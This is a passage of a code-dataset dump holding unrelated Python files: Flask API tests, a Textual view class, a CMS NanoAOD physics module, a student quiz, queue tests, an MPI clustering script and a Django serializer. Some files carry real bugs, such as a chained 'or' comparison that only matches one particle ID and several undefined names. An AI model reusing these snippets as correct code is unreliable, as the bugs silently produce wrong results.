'F')","sub_path":"bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"143574431","text":"import os\nimport json\nimport pytest\nfrom app import create_app, db\n\n\n@pytest.fixture\ndef app():\n app = create_app(config_name=\"testing\")\n with app.app_context():\n # create all tables\n db.create_all()\n yield app\n with app.app_context():\n # drop all tables\n db.session.remove()\n db.drop_all()\n\n@pytest.fixture\ndef test_alert():\n return {'title': 'test', 'message': 'fun test!'}\n\n\nclass TestNudge(object):\n\n\n def test_alert_creation(self, app, test_alert):\n \"\"\"Test API can create a bucketlist (POST request)\"\"\"\n res = app.test_client().post('/alerts/', data=test_alert)\n assert res.status_code == 201\n assert 'test' in str(res.data)\n\n def test_api_can_get_all_alerts(self, app, test_alert):\n \"\"\"Test API can get a bucketlist (GET request).\"\"\"\n res = app.test_client().post('/alerts/', data=test_alert)\n assert res.status_code == 201\n res = app.test_client().get('/alerts/')\n assert res.status_code == 200\n assert 'test' in str(res.data)\n\n def test_api_can_get_bucketlist_by_id(self, app, test_alert):\n \"\"\"Test API can get a single bucketlist by using it's id.\"\"\"\n rv = app.test_client().post('/alerts/', data=test_alert)\n assert rv.status_code == 201\n result_in_json = json.loads(rv.data.decode('utf-8').replace(\"'\", \"\\\"\"))\n result = app.test_client().get(\n '/alerts/{}'.format(result_in_json['id']))\n assert result.status_code == 200\n assert 'test' in str(result.data)\n\n def test_alert_can_be_edited(self, app, test_alert):\n \"\"\"Test API can edit an existing alert. (PUT request)\"\"\"\n rv = app.test_client().post(\n '/alerts/',\n data={'title': 'book idea', 'message': 'Eat, pray and love'})\n assert rv.status_code == 201\n rv = app.test_client().put(\n '/alerts/1',\n data={\n \"message\": \"Dont just eat, but also pray and love :-)\"\n })\n assert rv.status_code == 200\n results = app.test_client().get('/alerts/1')\n assert 'Dont just eat' in str(results.data)\n\n def test_edited_alert_must_have_title_and_message(self, app, test_alert):\n rv = app.test_client().post('/alerts/', data=test_alert)\n assert rv.status_code == 201\n rv = app.test_client().put(\n '/alerts/1',\n data={\n \"message\": \"\",\n \"title\": \"\"\n })\n assert rv.status_code == 500\n \n\n def test_alert_deletion(self, app, test_alert):\n \"\"\"Test API can delete an existing alert. (DELETE request).\"\"\"\n rv = app.test_client().post(\n '/alerts/',\n data={'message': 'Eat, pray and love', 'title': 'movie idea'})\n assert rv.status_code == 201\n res = app.test_client().delete('/alerts/1')\n assert res.status_code == 200\n # Test to see if it exists, should return a 404\n result = app.test_client().get('/alerts/1')\n assert result.status_code == 404","sub_path":"test_nudge.py","file_name":"test_nudge.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299886619","text":"from __future__ import annotations\n\nfrom abc import ABC, abstractmethod\nfrom time import time\nimport logging\nfrom typing import Optional, Tuple, TYPE_CHECKING\n\nfrom rich.console import Console, ConsoleOptions, RenderResult\nfrom rich.layout import Layout\nfrom rich.region import Region as LayoutRegion\nfrom rich.repr import rich_repr, RichReprResult\nfrom rich.segment import Segments\n\nfrom . import events\nfrom ._context import active_app\nfrom .geometry import Dimensions, Region\nfrom .message import Message\nfrom .message_pump import MessagePump\nfrom .widget import Widget, UpdateMessage\nfrom .widgets.header import Header\n\nif TYPE_CHECKING:\n from .app import App\n\nlog = logging.getLogger(\"rich\")\n\n\nclass NoWidget(Exception):\n pass\n\n\nclass View(ABC, MessagePump):\n @property\n def app(self) -> \"App\":\n return active_app.get()\n\n @property\n def console(self) -> Console:\n return active_app.get().console\n\n def __rich_console__(\n self, console: Console, options: ConsoleOptions\n ) -> RenderResult:\n return\n yield\n\n @abstractmethod\n async def mount(self, widget: Widget, *, slot: str = \"main\") -> None:\n ...\n\n async def mount_all(self, **widgets: Widget) -> None:\n for slot, widget in widgets.items():\n await self.mount(widget, slot=slot)\n\n async def forward_input_event(self, event: events.Event) -> None:\n pass\n\n\n@rich_repr\nclass LayoutView(View):\n layout: Layout\n\n def __init__(\n self,\n layout: Layout = None,\n name: str = \"default\",\n title: str = \"Layout Application\",\n ) -> None:\n self.name = name\n self.title = title\n if layout is None:\n layout = Layout()\n layout.split_column(\n Layout(name=\"header\", size=3, ratio=0),\n Layout(name=\"main\", ratio=1),\n Layout(name=\"footer\", size=1, ratio=0),\n )\n layout[\"main\"].split_row(\n Layout(name=\"left\", size=30, visible=True),\n Layout(name=\"body\", ratio=1),\n Layout(name=\"right\", size=30, visible=False),\n )\n self.layout = layout\n self.mouse_over: MessagePump | None = None\n self.focused: Widget | None = None\n self.size = Dimensions(0, 0)\n self._widgets: set[Widget] = set()\n super().__init__()\n self.enable_messages(events.Idle)\n\n def __rich_repr__(self) -> RichReprResult:\n yield \"name\", self.name\n\n def __rich_console__(\n self, console: Console, options: ConsoleOptions\n ) -> RenderResult:\n width, height = self.size\n segments = console.render(self.layout, options.update_dimensions(width, height))\n yield from segments\n\n def get_widget_at(self, x: int, y: int) -> Tuple[Widget, LayoutRegion]:\n for layout, (region, render) in self.layout.map.items():\n if Region(*region).contains(x, y):\n if isinstance(layout.renderable, Widget):\n return layout.renderable, region\n else:\n break\n raise NoWidget(f\"No widget at ${x}, ${y}\")\n\n async def on_message(self, message: Message) -> None:\n log.debug(\"on_message %r\", repr(message))\n if isinstance(message, UpdateMessage):\n widget = message.sender\n if widget in self._widgets:\n for layout, (region, render) in self.layout.map.items():\n if layout.renderable is widget:\n assert isinstance(widget, Widget)\n update = widget.render_update(region.x, region.y)\n segments = Segments(update)\n self.console.print(segments, end=\"\")\n\n # async def on_create(self, event: events.Created) -> None:\n # await self.mount(Header(self.title))\n\n async def mount(self, widget: Widget, *, slot: str = \"main\") -> None:\n self.layout[slot].update(widget)\n await self.app.add(widget)\n widget.set_parent(self)\n await widget.post_message(events.Mount(sender=self))\n self._widgets.add(widget)\n\n async def set_focus(self, widget: Optional[Widget]) -> None:\n log.debug(\"set_focus %r\", widget)\n if widget == self.focused:\n return\n\n if widget is None:\n if self.focused is not None:\n focused = self.focused\n self.focused = None\n await focused.post_message(events.Blur(self))\n elif widget.can_focus:\n if self.focused is not None:\n await self.focused.post_message(events.Blur(self))\n if widget is not None and self.focused != widget:\n self.focused = widget\n await widget.post_message(events.Focus(self))\n\n # async def on_startup(self, event: events.Startup) -> None:\n # await self.mount(Header(self.title), slot=\"header\")\n\n async def layout_update(self) -> None:\n if not self.size:\n return\n width, height = self.size\n region_map = self.layout._make_region_map(width, height)\n for layout, region in region_map.items():\n if isinstance(layout.renderable, Widget):\n await layout.renderable.post_message(\n events.Resize(self, region.width, region.height)\n )\n self.app.refresh()\n\n async def on_resize(self, event: events.Resize) -> None:\n self.size = Dimensions(event.width, event.height)\n await self.layout_update()\n\n async def _on_mouse_move(self, event: events.MouseMove) -> None:\n try:\n widget, region = self.get_widget_at(event.x, event.y)\n except NoWidget:\n if self.mouse_over is not None:\n try:\n await self.mouse_over.post_message(events.Leave(self))\n finally:\n self.mouse_over = None\n else:\n if self.mouse_over != widget:\n try:\n if self.mouse_over is not None:\n await self.mouse_over.post_message(events.Leave(self))\n if widget is not None:\n await widget.post_message(\n events.Enter(self, event.x - region.x, event.y - region.y)\n )\n finally:\n self.mouse_over = widget\n await widget.post_message(\n events.MouseMove(\n self,\n event.x - region.x,\n event.y - region.y,\n event.button,\n event.shift,\n event.meta,\n event.ctrl,\n )\n )\n\n async def forward_input_event(self, event: events.Event) -> None:\n if isinstance(event, (events.MouseDown)):\n try:\n widget, _region = self.get_widget_at(event.x, event.y)\n except NoWidget:\n await self.set_focus(None)\n else:\n await self.set_focus(widget)\n\n elif isinstance(event, events.MouseMove):\n await self._on_mouse_move(event)\n\n elif isinstance(event, events.MouseEvent):\n try:\n widget, region = self.get_widget_at(event.x, event.y)\n except NoWidget:\n pass\n else:\n await widget.forward_input_event(event)\n elif isinstance(event, (events.MouseScrollDown, events.MouseScrollUp)):\n widget, _region = self.get_widget_at(event.x, event.y)\n scroll_widget = widget or self.focused\n if scroll_widget is not None:\n await scroll_widget.forward_input_event(event)\n else:\n if self.focused is not None:\n await self.focused.forward_input_event(event)\n\n async def action_toggle(self, layout_name: str) -> None:\n visible = self.layout[layout_name].visible\n self.layout[layout_name].visible = not visible\n await self.layout_update()\n","sub_path":"src/textual/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"74368441","text":"import ROOT\nimport math, os\n\nROOT.PyConfig.IgnoreCommandLineOptions = True\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection \nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\nclass genpartsusy(Module):\n\tdef __init__(self):#, muonSelection, electronSelection):\n\t\t#self.isMC = isMC\n\t\t#self.isSig = isSig\n\t\t#self.muSel = muonSelection\n\t\t#self.elSel = electronSelection\n\t\tpass\n\tdef beginJob(self):\n\t\tpass\n\tdef endJob(self):\n\t\tpass\n\tdef beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n\t\tself.out = wrappedOutputTree\n\t\n\t\tself.out.branch(\"GenDeltaPhiLepWSum\",\"F\");\n\t\tself.out.branch(\"GenDeltaPhiLepWDirect\",\"F\");\n\t\tself.out.branch(\"GenWSumMass\",\"F\");\n\t\tself.out.branch(\"GenWDirectMass\",\"F\");\n\t\tself.out.branch(\"nidxGenWs\",\"I\");\n\t\tself.out.branch(\"GenmTLepNu\",\"F\");\n\t\tself.out.branch(\"LeptonDecayChannelFlag\",\"I\");\n\t\tself.out.branch(\"genTau_grandmotherId\",\"F\");\n\t\tself.out.branch(\"genTau_motherId\",\"F\");\n\t\tself.out.branch(\"genLep_grandmotherId\",\"F\");\n\t\tself.out.branch(\"genLep_motherId\",\"F\");\n\t\t#self.out.branch(\"IsDiLepEvent\",\"O\");\n\t\t#self.out.branch(\"IsSemiLepEvent\",\"O\");\n\tdef mt_2(p4one, p4two):\n\t\treturn sqrt(2*p4one.Pt()*p4two.Pt()*(1-cos(p4one.Phi()-p4two.Phi())))\n\tdef endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n\t\tpass\n\tdef analyze(self, event):\n\t\t\"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n\t\tgenpart = Collection(event, \"GenPart\")\n\t\t# The following variables still need to be double-checked for validity\n\t\tgenLeps = [l for l in genpart if l.pdgId == (13 or -13 or 11 or -11) and l.genPartIdxMother >= 0 ]\n\t\t# for some reason TTjets_* doesnot have GenPart_statusFla; better to check it before use it \n\t\tif hasattr(event,\"GenPart_statusFlags\"):\n\t\t\tgenLepFromTau = [l for l in genLeps if l.statusFlags == 2]\n\t\telse :genLepFromTau = [l for l in genLeps]\n\t\tgenTaus = [l for l in genpart if l.pdgId == (15 or -15) and l.genPartIdxMother >= 0]\n\t\tgenParts = [l for l in genpart]\n\t\t#leptons from tau decay https://github.com/cms-nanoAOD/cmssw/blob/master/PhysicsTools/NanoAOD/python/genparticles_cff.py#L67\n\t\tgenLepsAndLepsFromTaus = [l for l in genLeps] + [ l for l in genLepFromTau]\n\t\t\n\t\t#### for genlept mother and grandmother ID \t\t\n\t\t#print genLepsAndLepsFromTaus\n\t\tngenLepFromTau = len(genLepFromTau)\n\t\tngenLeps = len(genLeps)\n\t\tngenTaus = len(genTaus)\n\t\tngenParts = len (genParts)\n\t\tngenLepsAndLepsFromTau = len(genLepsAndLepsFromTaus)\n\t\t\n\t\tGenDeltaPhiLepWSum=-999\n\t\tGenDeltaPhiLepWDirect=-999\n\t\tGenWSumMass=-999\n\t\tGenWDirectMass=-999\n\t\tGenmTLepNu=-999\n\t\tLeptonDecayChannelFlag=-999 \n\t\tidx_genWs=[]\n\t\tidx_genLeps=[]\n\t\tidx_genNus=[]\n\t\tgenLep_motherId = -999\n\t\tgenLep_motherIdx = -999\n\t\tgenLep_grandmotherId = -999\n\t\tgenTau_motherId = -999\n\t\tgenTau_motherIdx = -999\n\t\tgenTau_grandmotherId = -999\n\t\t# find gen-level neutrinos (status 23), calculate deltaPhi (lep, nu), and genW-masses m(lep+nu)\n\t\t# for this: start from genLeps (status 23)\n\t\tfor glep in genLeps: \n\t\t\tif glep.status == 23 : \n\t\t\t\tgenLep_motherId = genpart[glep.genPartIdxMother].pdgId\n\t\t\t\tgenLep_motherIdx = glep.genPartIdxMother\n\t\t\t\tgenLep_grandmotherIdx = genpart[genLep_motherIdx].genPartIdxMother\n\t\t\t\tif genLep_grandmotherIdx >=0 : \n\t\t\t\t\tgenLep_grandmotherId = genpart[genLep_grandmotherIdx].pdgId\n\t\t\t\tself.out.fillBranch(\"genLep_motherId\",genLep_motherId)\n\t\t\t\tself.out.fillBranch(\"genLep_grandmotherId\",genLep_grandmotherId)\n\t\t\n\t\tfor gtau in genTaus: \n\t\t\tgenTau_motherId = genpart[gtau.genPartIdxMother].pdgId\n\t\t\tgenTau_motherIdx = gtau.genPartIdxMother\n\t\t\tgenTau_grandmotherIdx = genpart[genTau_motherIdx].genPartIdxMother\n\t\t\tif genTau_grandmotherIdx >=0:\n\t\t\t\tgenTau_grandmotherId = genpart[genTau_grandmotherIdx].pdgId\n\t\t\tself.out.fillBranch(\"genTau_motherId\",genLep_motherId)\n\t\t\tself.out.fillBranch(\"genTau_grandmotherId\",genTau_grandmotherId)\n\t\t\n\t\tfor i_lep, genLep in enumerate(genLeps):\n\t\t\tif genLep.status == 23 and abs(genParts[genLep.genPartIdxMother].pdgId) == 24: # genLep is outgoing and has W as mother\n\t\t\t\tW_idx = genLep.genPartIdxMother\n\t\t\t\tidx_genWs.append(W_idx)\n\t\t\t\tidx_genLeps.append(i_lep)\n\t\t\t\tfor i_nu, genPart in enumerate(genParts):\n\t\t\t\t\tif genPart.genPartIdxMother==W_idx and genPart.status == 23: # find W as mother\n\t\t\t\t\t\tif abs(genParts[genPart.genPartIdxMother].pdgId) == 12 or abs(genParts[genPart.genPartIdxMother].pdgId) == 14 or abs(genParts[genPart.genPartIdxMother].pdgId) == 16: #check whether it is a neutrino\n\t\t\t\t\t\t\tidx_genNus.append(i_nu)\n\t\t\n\t\t\n\t\tif(len(idx_genLeps)>=1):\n\t\t\tgenLepP4 = genLeps[idx_genLeps[0]].p4()\n\t\t\tif ngenParts >= idx_genNus:\n\t\t\t\tgenNuP4 = genParts[idx_genNus[0]].p4()\n\t\t\t\tgenWSumP4 = genLepP4 + genNuP4\n\t\t\t\tgenWDirectP4 = genParts[genLeps[idx_genLeps[0]].genPartIdxMother].p4()\n\t\t\t\tGenDeltaPhiLepWSum = genLepP4.DeltaPhi(genWSumP4)\n\t\t\t\tGenDeltaPhiLepWDirect = genLepP4.DeltaPhi(genWDirectP4)\n\t\t\t\tGenWSumMass = genWSumP4.M()\n\t\t\t\tGenWDirectMass = genWDirectP4.M()\n\t\t\t\tGenmTLepNu = mt_2(genLepP4,genNuP4)\n\t\t\n\t\t#print ngenLepsAndLepsFromTau, ngenLeps + ngenTaus, ngenLepFromTau+ngenLeps\n\t\tassert ngenLepsAndLepsFromTau==ngenLepFromTau+ngenLeps\n\t\tif ngenLeps + ngenTaus ==2: #looking at semileptonic events\n\t\t\tIsDiLepEvent = True\n\t\t\tIsHadTauEvent = (ngenTaus > ngenLepFromTau)\n\t\t\tLeptonsInAcceptance = True\n\t\t\tPtMax = -999\n\t\t\tfor l in genLepsAndLepsFromTaus: \n\t\t\t\tif l.pt>PtMax: PtMax = l.pt \n\t\t\n\t\t\tif IsHadTauEvent: LeptonDecayChannelFlag = 1 # preconfigure HadTau (becaus next loop won't start for two had taus in the event)\n\t\t\tfor l in genLepsAndLepsFromTaus:\n\t\t\t\tif PtMax>=25 and l.pt<10: LeptonsInAcceptance=False\n\t\t\t\tif PtMax<25 and l.pt<5: LeptonsInAcceptance=False\n\t\t\t\tlepEta = abs(l.eta)\n\t\t\t\tif (lepEta>2.5): LeptonsInAcceptance=False\n\t\t\t\tif (abs(l.pdgId) == 11 and lepEta >= 1.44 and lepEta < 1.57): LeptonsInAcceptance=False\n\t\t\t\t\n\t\t\t\tif IsHadTauEvent and not LeptonsInAcceptance: LeptonDecayChannelFlag = 0 # OutOfAcceptance and HadTau\n\t\t\t\telif IsHadTauEvent: LeptonDecayChannelFlag = 1 # HadTau (only)\n\t\t\t\telif not LeptonsInAcceptance: LeptonDecayChannelFlag = 2 # OutOfAcceptance (only)\n\t\t\t\telse: LeptonDecayChannelFlag = 3 # Rest (Id/Isolation/Resolution)\n\n\t\tself.out.fillBranch(\"GenDeltaPhiLepWSum\", GenDeltaPhiLepWSum) #initialize the dictionary with a first entry\n\t\tself.out.fillBranch(\"GenDeltaPhiLepWDirect\", GenDeltaPhiLepWDirect)\n\t\tself.out.fillBranch(\"GenWSumMass\", GenWSumMass)\n\t\tself.out.fillBranch(\"GenWDirectMass\", GenWDirectMass)\n\t\tself.out.fillBranch(\"GenmTLepNu\", GenmTLepNu)\n\t\tself.out.fillBranch(\"nidxGenWs\", len(idx_genWs))\n\t\tself.out.fillBranch(\"LeptonDecayChannelFlag\", LeptonDecayChannelFlag)\n\t\t\n\t\treturn True\n\n\n# define modules using the syntax 'name = lambda : constructor' to avoid having them loaded when not needed\nsusy_1l_gen = lambda : genpartsusy()#,\n \n","sub_path":"python/postprocessing/modules/susy1lep_gen.py","file_name":"susy1lep_gen.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305869012","text":"__author__ = 'Jiggy'\n\n# Prompts the user for a word and outputs the list of\n# all subwords of the word of height 1.\n#\n# Written by *** for COMP9021\n\n\ndef extract_subwords(word):\n pass\n # Replace pass above with your code\n temp_word = word.replace(' ','')\n # print('Word without spaces :', temp_word)\n finallist_of_words = []\n temp_string = ''\n found_opening_brecket = False\n\n for charaIndex in range(0, len(temp_word)):\n current_char = temp_word[charaIndex]\n if current_char == '(' and found_opening_brecket == False:\n found_opening_brecket = True\n temp_string += current_char\n elif current_char == '(' and found_opening_brecket == True:\n # print('temp string :', temp_string)\n sub_temp = ''\n if '(' in temp_string or ',' in temp_string:\n if temp_string.rfind(',') != -1:\n sub_temp = temp_string[temp_string.rfind(',')+1:]\n elif temp_string.rfind('(') != -1:\n sub_temp = temp_string[temp_string.rfind('(')+1:]\n\n # print('Sub temp', sub_temp)\n temp_string = ''\n temp_string += sub_temp + current_char\n else:\n temp_string = ''\n temp_string += current_char\n elif current_char == ',':\n if found_opening_brecket == True:\n temp_string += current_char +' '\n else:\n temp_string += current_char\n if current_char == ')' and found_opening_brecket == True:\n # print('Closing ', temp_string)\n finallist_of_words.append(temp_string.strip())\n temp_string = ''\n found_opening_brecket = False\n elif current_char == ')' and found_opening_brecket == False:\n temp_string = ''\n\n return_string = '\\t' + '['\n for my_word in finallist_of_words:\n return_string += '\\''+my_word+'\\'' + ', '\n\n ##if len(finallist_of_words) > 0:\n ## return_string = return_string[0: len(return_string)-2] + ']'\n ##else:\n ## return_string += ']'\n\n return finallist_of_words\n\nword = input('Enter a word: ')\nprint('The subwords of \"{:}\" of height 1 are:\\n {:}'.format(word, extract_subwords(word)))","sub_path":"quiz_3.py","file_name":"quiz_3.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106128500","text":"import pytest\nfrom pretend import stub\nfrom result_queue import Server, dispatch_dns, dispatch_https, dispatch_ssl\n\ntest_queues = {\n \"https\": stub(enqueue=lambda func, payload, retry, job_timeout, result_ttl: None),\n \"ssl\": stub(enqueue=lambda func, payload, retry, job_timeout, result_ttl: None),\n \"dns\": stub(enqueue=lambda func, payload, retry, job_timeout, result_ttl: None),\n}\n\n\n@pytest.fixture\ndef app():\n client = Server(\"test\", queues=test_queues)\n return client\n\n\n@pytest.fixture\ndef client(app):\n with app.test_client() as cli:\n yield cli\n\n\ndef test_enqueue_dns(client):\n test_payload = {\n \"scan_id\": 1,\n \"domain\": \"cyber.gc.ca\",\n \"selectors\": [\"selector1._domainkey\", \"selector2._domainkey\"],\n }\n\n res = client.post(\"/dns\", json=test_payload)\n\n assert res.data.decode(\"utf-8\") == \"DNS result processing request enqueued.\"\n\n\ndef test_enqueue_https(client):\n test_payload = {\n \"scan_id\": 1,\n \"domain\": \"cyber.gc.ca\",\n }\n\n res = client.post(\"/https\", json=test_payload)\n\n assert res.data.decode(\"utf-8\") == \"HTTPS result processing request enqueued.\"\n\n\ndef test_enqueue_ssl(client):\n test_payload = {\n \"scan_id\": 1,\n \"domain\": \"cyber.gc.ca\",\n }\n\n res = client.post(\"/ssl\", json=test_payload)\n\n assert res.data.decode(\"utf-8\") == \"SSL result processing request enqueued.\"\n","sub_path":"services/queues/result/tests/test_result_queue.py","file_name":"test_result_queue.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"455743384","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nimport os\nfrom os import path\nimport gc\nimport time\nimport numpy as np\nfrom tqdm import tqdm\n#from multiprocessing import Pool,Manager\nfrom mpipool import Pool\n#from schwimmbad import MPIPool as Pool\nimport multiprocessing \ntry:\n import cPickle as pickle\nexcept:\n import pickle\n# In[2]:\n\n\n\n# In[3]:\n\n\ndef merge(d1, d2):\n for item in d2:\n if item in d1.keys():\n d1[item] += d2[item]\n else:\n d1[item] = d2[item]\n\n\n# In[4]:\n\ndef L_func(cols,r,r2,n):\n l1= np.sqrt(r*np.ones(len(cols)) * col_count_ser[cols]/N ) * np.log((n+1)/(col_count_ser[cols]+1))\n l2= np.sqrt(r2*np.ones(len(cols)) * col_count_ser[cols]/N ) * np.log((n+1)/(col_count_ser[cols]+1))\n return np.dot(l1,l2)\n\n\ndef make_pairs(k):\n v=dict_A[k]\n r=row_count[k]\n for (k2,v2) in dict_A.items():\n if ((k,k2) not in Sim_pair.keys()) and ((k,k2) not in Sim_pair.keys()):\n common_keys= set(v).intersection(set(v2))\n #print(len(common_keys))\n r2=row_count[k2]\n Sim_pair[(k,k2)] = L_func(common_keys,r,r2,n)\n else:\n continue\n return Sim_pair\n\n# In[5]:\n\nif __name__ == '__main__':\n\n data = \"./clustering_Biden/\"\n\n N= 10000000\n\n\n\n# In[6]:\n\n\n entries=os.listdir(data)\n \n \n # In[7]:\n \n \n #from multiprocessing import Process, Lock, Manager\n # About 1min/file, may need parallization later.\n if (not path.exists(\"./dict_A.pickle\")):\n t1 = time.time()\n # A dictionary that holds all records in A\n dict_A = dict()\n # A dictionary that holds row counts\n row_count = dict()\n # A dictionary that holds row counts\n col_count = dict()\n \n \n for file in tqdm(entries):\n #def reformat(dict_A, row_count, col_count, file):\n file = data+file\n #print(file)\n df = pd.read_csv(file, index_col=\"Author\")\n #print(df.head(1))\n # Update column sum and row sum\n merge(col_count,df.count().to_dict())\n row_count.update(df.sum(axis=1).to_dict())\n #print(len(col_count))\n #print(len(row_count))\n for Author in df.index:\n cols=df.columns[df.loc[Author,:].notnull()]\n dict_A[Author] = cols.tolist()\n #print(dict_A)\n #print(df.info()) \n del df\n gc.collect()\n \n \n t2 = time.time()\n print(t2-t1)\n \n \n # In[9]:\n \n \n with open(\"./dict_A.pickle\",\"wb\") as pickle_dict_A:\n pickle.dump(dict_A, pickle_dict_A)\n with open(\"./row_count.pickle\",\"wb\") as pickle_row:\n pickle.dump(row_count, pickle_row)\n with open(\"./col_count.pickle\",\"wb\") as pickle_col:\n pickle.dump(col_count, pickle_col)\n else:\n with open(\"./dict_A.pickle\",\"rb\") as afile:\n dict_A = pickle.load(afile) \n with open(\"./row_count.pickle\",\"rb\") as rfile:\n row_count = pickle.load(rfile) \n with open(\"./col_count.pickle\",\"rb\") as cfile:\n col_count = pickle.load(cfile) \n \n #print(len(dict_A))\n #print(len(row_count))\n #print(len(col_count))\n \n \n col_count_ser = pd.Series(col_count)\n #row_count_ser = pd.Series(row_count)\n \n \n n=sum(col_count.values())\n #print(n)\n\n\n # m = Manager() \n\n # Sim_pair=m.dict()\n # num_cores=multiprocessing.cpu_count()\n num_cores=os.getenv(\"NSLOTS\")\n #print(\"num_cores: \", num_cores) \n\n t1 = time.time()\n key_list = list(dict_A.keys())\n# for k in key_list[rank*chunk:(rank+1)*chunk]:\n# make_pairs(k, Sim_pair)\n\n #processed_list = Parallel(n_jobs=num_cores)(delayed(make_pairs)(i) for i in inputs)\n \n Sim_pair=dict()\n # with Pool() as p:\n with Pool() as p:\n if not p.is_master():\n pool.wait()\n sys.exit(0)\n inputs = tqdm(key_list)\n Sim_pair_list = list(p.map(make_pairs, inputs))\n with open(\"./Sim_pair_mpipool/Sim_pair_\"+str(os.getpid)+\".pickle\",\"wb\") as pickle_out:\n pickle.dump(Sim_pair, pickle_out)\n #p.map(make_pairs, key_list[rank*chunk:(rank+1)*chunk])\n # print(len(Sim_pair_list))\n\n#for (k,v) in tqdm(dict_A.items()):\n t2 = time.time()\n #print(\"time used: \",t2-t1)\n\n Sim_pair_all=dict()\n #print(len(Sim_pair_list))\n for i in Sim_pair_list:\n Sim_pair_all.update(i)\n \n with open(\"./Sim_pair.pickle\",\"wb\") as pickle_out:\n pickle.dump(Sim_pair_all, pickle_out)\n \n","sub_path":"clustering_twitter_full_mpipool.py","file_name":"clustering_twitter_full_mpipool.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135202937","text":"\"\"\"\nJSON serializer with the following properties:\n - output is ordered (so revision control diffs are sane)\n - Fixes multi-table inheritance as per\n - https://code.djangoproject.com/ticket/24607\n - https://github.com/django/django/pull/4477/files\n\nThe patch at https://github.com/levic/django/tree/inheritance-natural-key patches core to work but only works with 1.9+\n\nThis implementation works with django 1.8 only (django ORM meta changed with 1.9)\n\nTo use, in your settings.py add:\n\nSERIALIZATION_MODULES = {\n 'json_orminheritancefix': 'allianceutils.serializers.json_orminheritancefix',\n 'json': 'allianceutils.serializers.json_orminheritancefix',\n}\n\n- We have to override the built-in json because we want to deserialize .json files correctly\n- There is no way to override django.core.serializers.python.Deserializer in part so this is a cut & paste\n of both the json & python deserializers with patches applied\n\"\"\"\n\n\nimport json\nimport sys\n\nimport allianceutils.serializers.json_ordered\nimport django\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.serializers import base\nfrom django.core.serializers.base import DeserializationError\nfrom django.db import DEFAULT_DB_ALIAS\nfrom django.db import models\nfrom django.utils import six\nfrom django.utils.encoding import force_text\n\n# The ORM _meta changed in 1.9, this code only works with 1.8\nassert (1, 9) <= django.VERSION < (1, 10), 'json_orminheritancefix19 only works with django 1.9'\n\n_NONE = object()\n\n\nclass Serializer(allianceutils.serializers.json_ordered.Serializer):\n def serialize(self, queryset, **options):\n options = options.copy()\n if options.get('use_natural_primary_keys', False):\n options['use_natural_foreign_keys'] = True\n\n return super(Serializer, self).serialize(queryset, **options)\n\n def get_dump_pk(self, obj, level):\n pk = obj._meta.pk\n if pk.remote_field:\n if self.use_natural_foreign_keys:\n return self.get_dump_pk(getattr(obj, pk.remote_field.field.name), level + 1)\n else:\n return force_text(obj.pk, strings_only=True)\n elif self.use_natural_primary_keys and hasattr(obj, \"natural_key\"):\n return _NONE if level == 0 else obj.natural_key()\n else:\n return force_text(obj.pk, strings_only=True)\n\n def get_dump_object(self, obj):\n data = super(Serializer, self).get_dump_object(obj)\n # overwrite default PK if necessary to handle where the PK is a FK\n pk = self.get_dump_pk(obj, 0)\n if pk is not _NONE:\n data[\"pk\"] = pk\n data['fields'] = self._current\n return data\n\n\n# No changes here except to use the PythonDeserializer function in this module\ndef Deserializer(stream_or_string, **options):\n \"\"\"\n Deserialize a stream or string of JSON data.\n \"\"\"\n if not isinstance(stream_or_string, (bytes, six.string_types)):\n stream_or_string = stream_or_string.read()\n if isinstance(stream_or_string, bytes):\n stream_or_string = stream_or_string.decode('utf-8')\n try:\n objects = json.loads(stream_or_string)\n for obj in _PythonDeserializer(objects, **options):\n yield obj\n except GeneratorExit:\n raise\n except Exception as e:\n # Map to deserializer error\n six.reraise(DeserializationError, DeserializationError(e), sys.exc_info()[2])\n\n\ndef _get_by_natural_pk(model, npk):\n while True:\n pk = model._meta.pk\n if pk.remote_field:\n model = pk.remote_field.model\n else:\n return model._default_manager.get_by_natural_key(*npk).pk\n\n\ndef _PythonDeserializer(object_list, **options):\n \"\"\"\n Deserialize simple Python objects back into Django ORM instances.\n It's expected that you pass the Python objects themselves (instead of a\n stream or a string) to the constructor\n \"\"\"\n db = options.pop('using', DEFAULT_DB_ALIAS)\n ignore = options.pop('ignorenonexistent', False)\n field_names_cache = {} # Model: \n\n for d in object_list:\n # Look up the model and starting build a dict of data for it.\n try:\n Model = _get_model(d[\"model\"])\n except base.DeserializationError:\n if ignore:\n continue\n else:\n raise\n data = {}\n if 'pk' in d:\n pk = d.get(\"pk\", None)\n if isinstance(pk, (list, tuple)):\n pk = _get_by_natural_pk(Model, pk)\n else:\n try:\n pk = Model._meta.pk.to_python(pk)\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], pk, None)\n data[Model._meta.pk.attname] = pk\n m2m_data = {}\n\n if Model not in field_names_cache:\n field_names_cache[Model] = {f.name for f in Model._meta.get_fields()}\n field_names = field_names_cache[Model]\n\n # Handle each field\n for (field_name, field_value) in six.iteritems(d[\"fields\"]):\n\n if ignore and field_name not in field_names:\n # skip fields no longer on model\n continue\n\n if isinstance(field_value, str):\n field_value = force_text(\n field_value, 